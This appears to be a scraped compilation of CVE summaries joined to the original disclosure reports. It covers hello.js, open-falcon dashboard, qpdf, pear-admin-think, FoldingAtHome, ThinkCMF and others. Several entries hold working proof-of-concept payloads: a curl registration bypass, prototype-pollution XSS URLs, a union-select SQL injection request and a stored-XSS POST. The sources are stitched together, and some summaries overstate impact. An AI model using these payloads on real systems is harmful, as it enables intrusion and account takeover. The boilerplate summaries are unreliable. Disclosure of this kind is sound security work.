A prototype pollution vulnerability in MrSwitch hello.js prior to version 1.18.8 allows remote attackers to execute arbitrary code via `hello.utils.extend` function.

**MrSwitch hello.js vulnerable to prototype pollution**

Moderate severity GitHub Reviewed Published Aug 11, 2023 to the GitHub Advisory Database • Updated Aug 11, 2023

GHSA-g3vf-47fv-8f3c: MrSwitch hello.js vulnerable to prototype pollution

An issue was discovered in open-falcon dashboard version 0.2.0, allows remote attackers to gain, modify, and delete sensitive information via crafted POST request to register interface.

Dear Author,  
I’m testivy. I found that the latest version 0.2.0 of falcon dashboard has a bypass problem of the registeration.As the link below:  
http://book.open-falcon.com/en\_0\_2/quick\_install/frontend.html#dashboard-user-management  
when we try to change the value of item "signup\_disable" to "true" in the API configuration file "cfg.json" then reboot API for a purpose to restrict the register function meaning that this is only for "sign in" not for "sign up".  
I found in the code that I can bypass it under the "/auth/register " interface. In this condition, I can bypass the registeration restriction and do as below:  
Call the user added interface and add a new user (POST https://127.0.0.1:8081/auth/register name=test&cnname=test&email=test@test.cn&password=xxx&repeat_password=xxx), then use the newly added account to log in to the dashboard for viewing ,modifing, and adding .

**Vulnerability details**  
This problem mainly occurs in _dashboard/rrd/view/auth/auth.py_

    @app.route("/auth/register", methods=["GET", "POST"])
    def auth_register():
        if request.method == "GET":
            if g.user:
                return redirect("/auth/login")
            return render_template("auth/register.html", **locals())
    
        if request.method == "POST":
            ret = {"msg":""}
    
            name = request.form.get("name", "").strip()
            cnname = request.form.get("cnname", "").strip()
            email = request.form.get("email", "").strip()
            password = request.form.get("password", "")
            repeat_password = request.form.get("repeat_password", "")
    
    

As we can see, the above if branches:  
in **if request.method == "GET"** will judge the g.user otherwise redirect to "/auth/login" ,But when the request.method == "POST",the system will get request param to add a account by "name,cnname,email,password and repeat\_password" to the backend. Under the certain circumstances,we can directly call the "auth/register" interface with post method to add a new user.

**Loopholes Reproduce**  
1.curl -XPOST 'http://127.0.0.1:8081/auth/register'  --data 'name=test&cnname=test&email=test%40test.cn&password=test1234&repeat_password=test1234'  
As we can see, register restriction has been bypassed and a new account has been added to the dashboard management without logging in.  
The response is as below:  
{"msg":""}   
2.View the console  

Visit the index page http://127.0.0.1:8081/, then log in to the new account, and you will can do anything.

Best Regards

CVE-2021-27523: Report a security vulnerability in falcon dashboard to bypass register restriction through the function in register has been closed · Issue #153 · open-falcon/dashboard

Prototype pollution vulnerability in MrSwitch hello.js version 1.18.6, allows remote attackers to execute arbitrary code via hello.utils.extend function.

**Abstract**

The function hello.utils.extend, defined in file hello.js, introduces a Prototype Pollution vulnerability, which could result in Cross-Site Scripting.

hello.utils \= {

// Extend the first object with the properties and methods of the second

extend: function(r /\*, a\[, b\[, ...\]\] \*/) {

// Get the arguments as an array but ommit the initial item

Array.prototype.slice.call(arguments, 1).forEach(function(a) {

if (Array.isArray(r) && Array.isArray(a)) {

Array.prototype.push.apply(r, a);

}

else if (r && (r instanceof Object || typeof r \=== 'object') && a && (a instanceof Object || typeof a \=== 'object') && r !== a) {

for (var x in a) {

r\[x\] \= hello.utils.extend(r\[x\], a\[x\]);

}

}

else {

if (Array.isArray(a)) {

// Clone it

a \= a.slice(0);

}

r \= a;

}

});

return r;

}

};

The code on Line 29 has a typical pattern of Prototype Pollution.

    r[x] = hello.utils.extend(r[x], a[x]);
    

The vulnerable lines of code, then, are called on Line 1320, which could allow attackers to pollute the object in JavaScript.  

p \= \_this.merge(\_this.param(location.search || ''), \_this.param(location.hash || ''));

**Proof of Concepts**

As a result, websites, which use the hello.js, might highly likely have Cross-Site Scripting. Take the offical demo of hello.js as an example, the Prototype Pollution could be exploited as follows:

https://adodson.com/hello.js/demos/events.html#state={%22a%22:%221%22,%22\_\_proto\_\_%22:{%22callback%22:%22alert%22}}  
https://adodson.com/hello.js/demos/events.html#state={%22a%22:%221%22,%22\_\_proto\_\_%22:{%22onbeforescriptexecute%22:%22alert(location.href)%22}}  

**Suggestion**

*   Freeze the prototype— use Object.freeze (Object.prototype).
*   Require schema validation of JSON input.
*   Avoid using unsafe recursive merge functions.
*   Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
*   As a best practice use Map instead of Object.

CVE-2021-26505: Prototype Pollution in hello.js · Issue #634 · MrSwitch/hello.js

An issue was discovered in QPDF version 10.0.4, allows remote attackers to execute arbitrary code via crafted .pdf file to Pl_ASCII85Decoder::write parameter in libqpdf.

*   version: 10.0.4
*   commit: 78b9d6b
*   How to reproduce: qpdf\_afl\_fuzzer ./poc

The log from ASAN:

    ==28751==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000076c5 at pc 0x0000008799bc bp 0x7fffffff6a30 sp 0x7fffffff6a28
    WRITE of size 1 at 0x6070000076c5 thread T0
        #0 0x8799bb in Pl_ASCII85Decoder::write(unsigned char*, unsigned long) /src/qpdf/libqpdf/Pl_ASCII85Decoder.cc:85:32
        #1 0x877725 in Pl_AES_PDF::flush(bool) /src/qpdf/libqpdf/Pl_AES_PDF.cc:241:16
        #2 0x877c75 in Pl_AES_PDF::finish() /src/qpdf/libqpdf/Pl_AES_PDF.cc
        #3 0x5996ab in QPDF::pipeStreamData(PointerHolder<QPDF::EncryptionParameters>, PointerHolder<InputSource>, QPDF&, int, int, long long, unsigned long, QPDFObjectHandle, bool, Pipeline*, bool, bool) /src/qpdf/libqpdf/QPDF.cc:2899:23
        #4 0x599c9d in QPDF::pipeStreamData(int, int, long long, unsigned long, QPDFObjectHandle, Pipeline*, bool, bool) /src/qpdf/libqpdf/QPDF.cc:2920:12
        #5 0x77e4c7 in QPDF::Pipe::pipeStreamData(QPDF*, int, int, long long, unsigned long, QPDFObjectHandle, Pipeline*, bool, bool) /src/qpdf/include/qpdf/QPDF.hh:718:19
        #6 0x76e02e in QPDF_Stream::pipeStreamData(Pipeline*, bool*, int, qpdf_stream_decode_level_e, bool, bool) /src/qpdf/libqpdf/QPDF_Stream.cc:700:8
        #7 0x637e27 in QPDFObjectHandle::pipeStreamData(Pipeline*, int, qpdf_stream_decode_level_e, bool, bool) /src/qpdf/libqpdf/QPDFObjectHandle.cc:1228:51
        #8 0x700fbf in QPDFWriter::unparseObject(QPDFObjectHandle, int, int, unsigned long, bool) /src/qpdf/libqpdf/QPDFWriter.cc:1826:24
        #9 0x71f286 in QPDFWriter::writeObject(QPDFObjectHandle, int) /src/qpdf/libqpdf/QPDFWriter.cc:2169:2
        #10 0x737528 in QPDFWriter::writeStandard() /src/qpdf/libqpdf/QPDFWriter.cc:3676:2
        #11 0x72aae7 in QPDFWriter::write() /src/qpdf/libqpdf/QPDFWriter.cc:2745:2
        #12 0x51bb07 in FuzzHelper::doWrite(PointerHolder<QPDFWriter>) /src/qpdf_afl_fuzzer.cc:68:12
        #13 0x51cb03 in FuzzHelper::testWrite() /src/qpdf_afl_fuzzer.cc:92:5
        #14 0x5219a6 in FuzzHelper::doChecks() /src/qpdf_afl_fuzzer.cc:194:5
        #15 0x5219a6 in FuzzHelper::run() /src/qpdf_afl_fuzzer.cc:210
        #16 0x5221b7 in main /src/qpdf_afl_fuzzer.cc:228:7
        #17 0x7ffff6a99bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
        #18 0x41eb89 in _start (/src/qpdf_afl_fuzzer+0x41eb89)
    
    0x6070000076c5 is located 21 bytes inside of 78-byte region [0x6070000076b0,0x6070000076fe)
    freed by thread T0 here:
        #0 0x517d68 in operator delete(void*) (/src/qpdf_afl_fuzzer+0x517d68)
        #1 0x7ffff7af21a9 in std::runtime_error::~runtime_error() (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0xa81a9)
        #2 0x599c9d in QPDF::pipeStreamData(int, int, long long, unsigned long, QPDFObjectHandle, Pipeline*, bool, bool) /src/qpdf/libqpdf/QPDF.cc:2920:12
        #3 0x77e4c7 in QPDF::Pipe::pipeStreamData(QPDF*, int, int, long long, unsigned long, QPDFObjectHandle, Pipeline*, bool, bool) /src/qpdf/include/qpdf/QPDF.hh:718:19
        #4 0x76e02e in QPDF_Stream::pipeStreamData(Pipeline*, bool*, int, qpdf_stream_decode_level_e, bool, bool) /src/qpdf/libqpdf/QPDF_Stream.cc:700:8
        #5 0x637e27 in QPDFObjectHandle::pipeStreamData(Pipeline*, int, qpdf_stream_decode_level_e, bool, bool) /src/qpdf/libqpdf/QPDFObjectHandle.cc:1228:51
        #6 0x700fbf in QPDFWriter::unparseObject(QPDFObjectHandle, int, int, unsigned long, bool) /src/qpdf/libqpdf/QPDFWriter.cc:1826:24
        #7 0x71f286 in QPDFWriter::writeObject(QPDFObjectHandle, int) /src/qpdf/libqpdf/QPDFWriter.cc:2169:2
        #8 0x737528 in QPDFWriter::writeStandard() /src/qpdf/libqpdf/QPDFWriter.cc:3676:2
        #9 0x72aae7 in QPDFWriter::write() /src/qpdf/libqpdf/QPDFWriter.cc:2745:2
        #10 0x51bb07 in FuzzHelper::doWrite(PointerHolder<QPDFWriter>) /src/qpdf_afl_fuzzer.cc:68:12
        #11 0x5219a6 in FuzzHelper::doChecks() /src/qpdf_afl_fuzzer.cc:194:5
        #12 0x5219a6 in FuzzHelper::run() /src/qpdf_afl_fuzzer.cc:210
        #13 0x7ffff6a99bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
    
    previously allocated by thread T0 here:
        #0 0x516ff0 in operator new(unsigned long) (/src/qpdf_afl_fuzzer+0x516ff0)
        #1 0x7ffff7b1dc28 in std::string::_Rep::_S_create(unsigned long, unsigned long, std::allocator<char> const&) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0xd3c28)
        #2 0x883ce8 in Pl_Flate::handleData(unsigned char*, unsigned long, int) /src/qpdf/libqpdf/Pl_Flate.cc:197:12
        #3 0x8833d5 in Pl_Flate::write(unsigned char*, unsigned long) /src/qpdf/libqpdf/Pl_Flate.cc:92:9
        #4 0x87a0a7 in Pl_ASCII85Decoder::flush() /src/qpdf/libqpdf/Pl_ASCII85Decoder.cc:122:16
        #5 0x87997b in Pl_ASCII85Decoder::write(unsigned char*, unsigned long) /src/qpdf/libqpdf/Pl_ASCII85Decoder.cc:88:4
        #6 0x877725 in Pl_AES_PDF::flush(bool) /src/qpdf/libqpdf/Pl_AES_PDF.cc:241:16
    
    SUMMARY: AddressSanitizer: heap-use-after-free /src/qpdf/libqpdf/Pl_ASCII85Decoder.cc:85:32 in Pl_ASCII85Decoder::write(unsigned char*, unsigned long)
    Shadow bytes around the buggy address:
      0x0c0e7fff8e80: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa
      0x0c0e7fff8e90: 00 00 00 00 00 00 00 00 01 fa fa fa fa fa fd fd
      0x0c0e7fff8ea0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
      0x0c0e7fff8eb0: fd fd fd fd fd fd fa fa fa fa 00 00 00 00 00 00
      0x0c0e7fff8ec0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00
    =>0x0c0e7fff8ed0: 00 fa fa fa fa fa fd fd[fd]fd fd fd fd fd fd fd
      0x0c0e7fff8ee0: fa fa fa fa fd fd fd fd fd fd fd fd fd fa fa fa
      0x0c0e7fff8ef0: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa
      0x0c0e7fff8f00: 00 00 00 00 00 00 00 00 01 fa fa fa fa fa fa fa
      0x0c0e7fff8f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff8f20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==28751==ABORTING
    

The test program is a wrapper that I modified based on oss-fuzz wrapper:

// file name is qpdf\_afl\_fuzzer.c
#include <qpdf/QPDF.hh>
#include <qpdf/QPDFWriter.hh>
#include <qpdf/QUtil.hh>
#include <qpdf/BufferInputSource.hh>
#include <qpdf/Buffer.hh>
#include <qpdf/Pl\_Discard.hh>
#include <qpdf/QPDFPageDocumentHelper.hh>
#include <qpdf/QPDFPageObjectHelper.hh>
#include <qpdf/QPDFPageLabelDocumentHelper.hh>
#include <qpdf/QPDFOutlineDocumentHelper.hh>
#include <qpdf/QPDFAcroFormDocumentHelper.hh>
#include <cstdlib>

class DiscardContents: public QPDFObjectHandle::ParserCallbacks
{
  public:
    virtual ~DiscardContents() {}
    virtual void handleObject(QPDFObjectHandle) {}
    virtual void handleEOF() {}
};

class FuzzHelper
{
  public:
    FuzzHelper(char\* data);
    void run();

  private:
    PointerHolder<QPDF\> getQpdf();
    PointerHolder<QPDFWriter\> getWriter(PointerHolder<QPDF\>);
    void doWrite(PointerHolder<QPDFWriter\> w);
    void testWrite();
    void testPages();
    void testOutlines();
    void doChecks();
    char const\* input\_f;
    Pl\_Discard discard;
};

FuzzHelper::FuzzHelper(char\* \_input) :
    // We do not modify data, so it is safe to remove the const for Buffer
    input\_f(\_input)
{
}

PointerHolder<QPDF\>
FuzzHelper::getQpdf()
{
    PointerHolder<QPDF\> qpdf \= new QPDF();
    qpdf\->processFile(input\_f);
    return qpdf;
}

PointerHolder<QPDFWriter\>
FuzzHelper::getWriter(PointerHolder<QPDF\> qpdf)
{
    PointerHolder<QPDFWriter\> w \= new QPDFWriter(\*qpdf);
    w\->setOutputPipeline(&this\->discard);
    w\->setDecodeLevel(qpdf\_dl\_all);
    return w;
}

void
FuzzHelper::doWrite(PointerHolder<QPDFWriter\> w)
{
    try
    {
        w\->write();
    }
    catch (QPDFExc const& e)
    {
        std::cerr << e.what() << std::endl;
    }
    catch (std::runtime\_error const& e)
    {
        std::cerr << e.what() << std::endl;
    }
}

void
FuzzHelper::testWrite()
{
    // Write in various ways to exercise QPDFWriter

    PointerHolder<QPDF\> q;
    PointerHolder<QPDFWriter\> w;

    q \= getQpdf();
    w \= getWriter(q);
    w\->setDeterministicID(true);
    w\->setQDFMode(true);
    doWrite(w);

    q \= getQpdf();
    w \= getWriter(q);
    w\->setStaticID(true);
    w\->setLinearization(true);
    w\->setR6EncryptionParameters(
        "u", "o", true, true, true, true, true, true, qpdf\_r3p\_full, true);
    doWrite(w);

    q \= getQpdf();
    w \= getWriter(q);
    w\->setStaticID(true);
    w\->setObjectStreamMode(qpdf\_o\_disable);
    w\->setR3EncryptionParameters(
	"u", "o", true, true, qpdf\_r3p\_full, qpdf\_r3m\_all);
    doWrite(w);

    q \= getQpdf();
    w \= getWriter(q);
    w\->setDeterministicID(true);
    w\->setObjectStreamMode(qpdf\_o\_generate);
    w\->setLinearization(true);
    doWrite(w);
}

void
FuzzHelper::testPages()
{
    // Parse all content streams, and exercise some helpers that
    // operate on pages.
    PointerHolder<QPDF\> q \= getQpdf();
    QPDFPageDocumentHelper pdh(\*q);
    QPDFPageLabelDocumentHelper pldh(\*q);
    QPDFOutlineDocumentHelper odh(\*q);
    QPDFAcroFormDocumentHelper afdh(\*q);
    afdh.generateAppearancesIfNeeded();
    pdh.flattenAnnotations();
    std::vector<QPDFPageObjectHelper\> pages \= pdh.getAllPages();
    DiscardContents discard\_contents;
    int pageno \= 0;
    for (std::vector<QPDFPageObjectHelper\>::iterator iter \=
             pages.begin();
         iter != pages.end(); ++iter)
    {
        QPDFPageObjectHelper& page(\*iter);
        ++pageno;
        try
        {
            page.coalesceContentStreams();
            page.parsePageContents(&discard\_contents);
            page.getPageImages();
            pldh.getLabelForPage(pageno);
            QPDFObjectHandle page\_obj(page.getObjectHandle());
            page\_obj.getJSON(true).unparse();
            odh.getOutlinesForPage(page\_obj.getObjGen());

            std::vector<QPDFAnnotationObjectHelper\> annotations \=
                afdh.getWidgetAnnotationsForPage(page);
            for (std::vector<QPDFAnnotationObjectHelper\>::iterator annot\_iter \=
                     annotations.begin();
                 annot\_iter != annotations.end(); ++annot\_iter)
            {
                QPDFAnnotationObjectHelper& aoh \= \*annot\_iter;
                afdh.getFieldForAnnotation(aoh);
            }
        }
        catch (QPDFExc& e)
        {
            std::cerr << "page " << pageno << ": "
                      << e.what() << std::endl;
        }
    }
}

void
FuzzHelper::testOutlines()
{
    PointerHolder<QPDF\> q \= getQpdf();
    std::list<std::vector<QPDFOutlineObjectHelper\> \> queue;
    QPDFOutlineDocumentHelper odh(\*q);
    queue.push\_back(odh.getTopLevelOutlines());
    while (! queue.empty())
    {
        std::vector<QPDFOutlineObjectHelper\>& outlines \= \*(queue.begin());
        for (std::vector<QPDFOutlineObjectHelper\>::iterator iter \=
                 outlines.begin();
             iter != outlines.end(); ++iter)
        {
            QPDFOutlineObjectHelper& ol \= \*iter;
            ol.getDestPage();
            queue.push\_back(ol.getKids());
        }
        queue.pop\_front();
    }
}

void
FuzzHelper::doChecks()
{
    // Get as much coverage as possible in parts of the library that
    // might benefit from fuzzing.
    testWrite();
    testPages();
    testOutlines();
}

void
FuzzHelper::run()
{
    // The goal here is that you should be able to throw anything at
    // libqpdf and it will respond without any memory errors and never
    // do anything worse than throwing a QPDFExc or
    // std::runtime\_error. Throwing any other kind of exception,
    // segfaulting, or having a memory error (when built with
    // appropriate sanitizers) will all cause abnormal exit.
    try
    {
        doChecks();
    }
    catch (QPDFExc const& e)
    {
        std::cerr << "QPDFExc: " << e.what() << std::endl;
    }
    catch (std::runtime\_error const& e)
    {
        std::cerr << "runtime\_error: " << e.what() << std::endl;
    }
}

int main(int argc, char\*\* argv){
    if (argc < 2){
	    std::cerr << "Please input the processed file!\\n";
    }
    FuzzHelper f(argv\[1\]);
    f.run();
    return 0;
}

The PoC file is attached:  
poc.zip

CVE-2021-25786: Heap-use-after-free in `Pl_ASCII85Decoder::write` · Issue #492 · qpdf/qpdf

Cross Site Scripting (XSS) vulnerability in Name Input Field in Contact Us form in Laborator Kalium before 3.0.4, allows remote attackers to execute arbitrary code.

CVE-2020-24075: Kalium Changelog - Laborator

SQL Injection in pear-admin-think version 2.1.2, allows attackers to execute arbitrary code and escalate privileges via crafted GET request to Crud.php.

pear-admin-think V2.1.2 has a sql injection vulnerability

sql injection vulnerability exists in pear-admin-think V2.1.2  
This vulnerability allows remote attackers to obtain user sensitive data and even command execution

url:/admin.php/admin.crud/list/name/admin\_admin?page=1&limit=10  
Vulnerability file:app/admin/controller/admin/Crud.php

        public function list($name)
        {
            $sql = Db::query('SELECT COLUMN_NAME,IS_NULLABLE,DATA_TYPE,IF(COLUMN_COMMENT = "",COLUMN_NAME,COLUMN_COMMENT) COLUMN_COMMENT FROM information_schema.COLUMNS WHERE TABLE_NAME = "' . $name . '"order by ORDINAL_POSITION asc');
            $this->jsonApi('', 0, $sql);
        }
    

Vulnerability exploitation:  
1.Log in backstage  
2.Curd:  
  

poc:

    GET /admin.php/admin.crud/list/name/123"union%20select%201,database(),3,4%23?page=1&limit=10 HTTP/1.1
    Host: www.padmin.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://www.padmin.com/admin.php/admin.crud/index
    Cookie: thinkphp_show_page_trace=0|0; _ga=GA1.2.82281587.1616725844; _gid=GA1.2.1061036003.1616725844; PHPSESSID=24b6f9927555352d4dbfbdf7c145d92a; thinkphp_show_page_trace=0|0; hash=606a3660a4af22638d896476e523344aa470e9b38ea908989711bb9abe5d92b57d31c36a923ed9bd379b16a871efca19b4d6847d9fc88b180e9f620c36a26b8a1f40fc99a846d2ac8eb60b4b4c8cc845
    X-Forwarded-For: 127.0.0.1
    X-Originating-IP: 127.0.0.1
    X-Remote-IP: 127.0.0.1
    X-Remote-Addr: 127.0.0.1

CVE-2021-29378: pear-admin-think V2.1.2 has a sql injection vulnerability · Issue #I3DIEC · Pear Admin/Pear Admin Think - Gitee.com

An issue was discovered in FoldingAtHome Client Advanced Control GUI before commit 9b619ae64443997948a36dda01b420578de1af77, allows remote attackers to execute arbitrary code via crafted payload to function parse_message in file Connection.py.

@@ -0,0 +1,216 @@ ################################################################################ \# # \# Folding@Home Client Control (FAHControl) # \# Copyright (C) 2016-2020 foldingathome.org # \# Copyright (C) 2010-2016 Stanford University # \# # \# This program is free software: you can redistribute it and/or modify # \# it under the terms of the GNU General Public License as published by # \# the Free Software Foundation, either version 3 of the License, or # \# (at your option) any later version. # \# # \# This program is distributed in the hope that it will be useful, # \# but WITHOUT ANY WARRANTY; without even the implied warranty of # \# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # \# GNU General Public License for more details. # \# # \# You should have received a copy of the GNU General Public License # \# along with this program. If not, see <http://www.gnu.org/licenses/>. # \# # ################################################################################  
import re import json import sys  
  
NUMBER\_RE \= re.compile(r'(-?(?:0|\[1-9\]\\d\*))(\\.\\d+)?(\[eE\]\[-+\]?\\d+)?', (re.VERBOSE | re.MULTILINE | re.DOTALL)) FLAGS \= re.VERBOSE | re.MULTILINE | re.DOTALL STRINGCHUNK \= re.compile(r'(.\*?)(\["\\\\\\x00-\\x1f\])', FLAGS) BACKSLASH \= { '"': u'"', '\\\\': u'\\\\', '/': u'/', 'b': u'\\b', 'f': u'\\f', 'n': u'\\n', 'r': u'\\r', 't': u'\\t', }  
DEFAULT\_ENCODING \= "utf-8"  
  
def linecol(doc, pos): lineno \= doc.count('\\n', 0, pos) + 1 if lineno \== 1: colno \= pos + 1 else: colno \= pos \- doc.rindex('\\n', 0, pos) return lineno, colno  
  
def errmsg(msg, doc, pos, end\=None): \# Note that this function is called from \_json lineno, colno \= linecol(doc, pos) if end is None: fmt \= '{0}: line {1} column {2} (char {3})' return fmt.format(msg, lineno, colno, pos)  
endlineno, endcolno \= linecol(doc, end) fmt \= '{0}: line {1} column {2} - line {3} column {4} (char {5} - {6})' return fmt.format(msg, lineno, colno, endlineno, endcolno, pos, end)  
  
def \_decode\_uXXXX(s, pos): esc \= s\[pos + 1:pos + 5\]  
if len(esc) \== 4 and esc\[1\] not in 'xX': try: return int(esc, 16) except ValueError: pass  
msg \= "Invalid \\\\uXXXX escape" raise ValueError(errmsg(msg, s, pos))  
  
def pyon\_scanstring(s, end, encoding \= None, strict \= True, \_b \= BACKSLASH, \_m \= STRINGCHUNK.match): """Scan the string s for a JSON string. End is the index of the character in s after the quote that started the JSON string. Unescapes all valid JSON string escape sequences and raises ValueError on attempt to decode an invalid string. If strict is False then literal control characters are allowed in the string. Returns a tuple of the decoded string and the index of the character in s after the end quote.""" if encoding is None: encoding \= DEFAULT\_ENCODING chunks \= \[\] \_append \= chunks.append begin \= end \- 1  
while True: chunk \= \_m(s, end) if chunk is None: raise ValueError( errmsg("Unterminated string starting at", s, begin))  
end \= chunk.end() content, terminator \= chunk.groups()  
\# Content is contains zero or more unescaped string characters if content: if not isinstance(content, unicode): content \= unicode(content, encoding) \_append(content)  
\# Terminator is the end of string, a literal control character, \# or a backslash denoting that an escape sequence follows if terminator \== '"': break elif terminator != '\\\\': if strict: msg \= "Invalid control character {0!r} at".format(terminator) raise ValueError(errmsg(msg, s, end)) else: \_append(terminator) continue  
try: esc \= s\[end\] except IndexError: raise ValueError(errmsg("Unterminated string starting at", s, begin))  
\# If not a unicode escape sequence, must be in the lookup table if esc != 'u' and esc != 'x': try: char \= \_b\[esc\] except KeyError: msg \= "Invalid \\\\escape: " + repr(esc) raise ValueError(errmsg(msg, s, end)) end += 1  
elif esc \== 'x': \# Hex escape sequence try: code \= s\[end + 1: end + 3\] char \= code.decode('hex') except: raise ValueError(errmsg('Invalid \\\\escape: ' + repr(code), s, end))  
end += 3  
else: \# Unicode escape sequence uni \= \_decode\_uXXXX(s, end) end += 5 \# Check for surrogate pair on UCS-4 systems if sys.maxunicode \> 65535 and \\ 0xd800 <= uni <= 0xdbff and s\[end:end + 2\] \== '\\\\u': uni2 \= \_decode\_uXXXX(s, end + 1) if 0xdc00 <= uni2 <= 0xdfff: uni \= 0x10000 + (((uni \- 0xd800) << 10) | (uni2 \- 0xdc00)) end += 6 char \= unichr(uni)  
\# Append the unescaped character \_append(char)  
return u''.join(chunks), end  
  
  
def make\_pyon\_scanner(context): parse\_object \= context.parse\_object parse\_array \= context.parse\_array parse\_string \= context.parse\_string match\_number \= NUMBER\_RE.match strict \= context.strict parse\_float \= context.parse\_float parse\_int \= context.parse\_int parse\_constant \= context.parse\_constant object\_hook \= context.object\_hook object\_pairs\_hook \= context.object\_pairs\_hook  
  
def scan\_once(string, idx): try: nextchar \= string\[idx\] except IndexError: raise StopIteration(idx)  
if nextchar \== '"': return parse\_string(string, idx + 1, 'utf-8', strict) elif nextchar \== '{': return parse\_object((string, idx + 1), 'utf-8', strict, scan\_once, object\_hook, object\_pairs\_hook) elif nextchar \== '\[': return parse\_array((string, idx + 1), scan\_once) elif nextchar \== 'N' and string\[idx:idx + 4\] \== 'None': return None, idx + 4 elif nextchar \== 'T' and string\[idx:idx + 4\] \== 'True': return True, idx + 4 elif nextchar \== 'F' and string\[idx:idx + 5\] \== 'False': return False, idx + 5  
m \= match\_number(string, idx) if m is not None: integer, frac, exp \= m.groups() if frac or exp: res \= parse\_float(integer + (frac or '') + (exp or '')) else: res \= parse\_int(integer)  
return res, m.end()  
elif nextchar \== 'N' and string\[idx:idx + 3\] \== 'NaN': return parse\_constant('NaN'), idx + 3  
elif nextchar \== 'I' and string\[idx:idx + 8\] \== 'Infinity': return parse\_constant('Infinity'), idx + 8  
elif nextchar \== '-' and string\[idx:idx + 9\] \== '-Infinity': return parse\_constant('-Infinity'), idx + 9  
else: raise StopIteration(idx)  
  
return scan\_once  
  
class PYONDecoder(json.JSONDecoder): def \_\_init\_\_(self, \*args, \*\*kwargs): json.JSONDecoder.\_\_init\_\_(self, \*args, \*\*kwargs) self.parse\_string \= pyon\_scanstring self.scan\_once \= make\_pyon\_scanner(self)

CVE-2020-27544: Use PYONDecoder instead of eval() · FoldingAtHome/fah-control@9b619ae

Cross Site Scripting (XSS) vulnerability in content1 parameter in demo.jsp in kindsoft kindeditor version 4.1.12, allows attackers to execute arbitrary code.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-28717: XSS vulnerability in demo.jsp · Issue #321 · kindsoft/kindeditor

Cross Site Scripting (XSS) vulnerability in UserController.php in ThinkCMF version 5.1.5, allows attackers to execute arbitrary code via crafted user_login.

At vendor/thinkcmf/cmf-app/src/admin/controller/UserController.php

There is no filtering of the user's post requests.

For example:

line 138:

$result             = DB::name('user')->insertGetId($_POST);

line 221:  
$result = DB::name('user')->update($_POST);

So There is a Stored XSS vulnerability in user management,

POC:

    POST /admin/user/addpost.html HTTP/1.1
    Host: test.net
    Connection: close
    Content-Length: 115
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: https://test.net
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://test.net/admin/user/add.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: thinkphp_show_page_trace=0|0; admin_username=admin; PHPSESSID=ju91k4c4do16sl2qqac553edl1
    
    user_login=%3Cimg+src%3D''+onerror%3Dalert(%2Fxss%2F)%3E&user_pass=123456&user_email=1111%40qqq.com&role_id%5B%5D=2

CVE-2020-25915: There is a store Stored XSS vulnerability in user management · Issue #675 · thinkcmf/thinkcmf

Cross Site Scripting (XSS) vulnerability in Query Report feature in Zoho ManageEngine Password Manager Pro version 11001, allows remote attackers to execute arbitrary code and steal cookies via crafted JavaScript payload.

Tag

#js